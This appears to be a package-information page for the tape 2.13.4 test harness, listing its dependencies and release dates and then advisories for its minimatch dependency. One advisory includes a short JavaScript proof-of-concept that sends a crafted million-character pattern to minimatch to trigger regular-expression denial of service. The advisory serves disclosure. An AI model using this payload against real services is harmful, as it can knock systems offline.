Tape is a popular and lightweight TAP-producing test harness specifically designed for Node.js and browser environments. Version 2.13.4 represents a minor update over its predecessor, version 2.13.3, both maintaining the same core functionality and developer-friendly experience. The core dependencies remain consistent, featuring modules like glob for file system matching, defined for concise variable checks, resumer and through for streaming utilities, inherits for prototype-based inheritance, deep-equal for robust object comparison, and object-inspect for detailed object string representations. Similarly, the development dependencies used for testing and building Tape itself, including tap for running tests, falafel for AST manipulation, and concat-stream for efficient stream handling, were unchanged.
The key distinction lies in the release date: version 2.13.4 was published on July 20, 2014, whereas version 2.13.3 was released on June 12, 2014. This suggests that version 2.13.4 likely contains bug fixes, performance improvements, or minor internal adjustments implemented after the preceding release. Developers benefit from Tape's simplicity and its generation of TAP-compliant output, readily compatible with various TAP reporters and CI systems. Tape remains authored by James Halliday (substack), and distributed under the permissive MIT license. Given the subtle nature of the changes between these versions, upgrading from 2.13.3 to 2.13.4 is recommended to take advantage of any fixes. Consider reviewing the commit history for specific details on the updates.
All the vulnerabilities related to the version 2.13.4 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.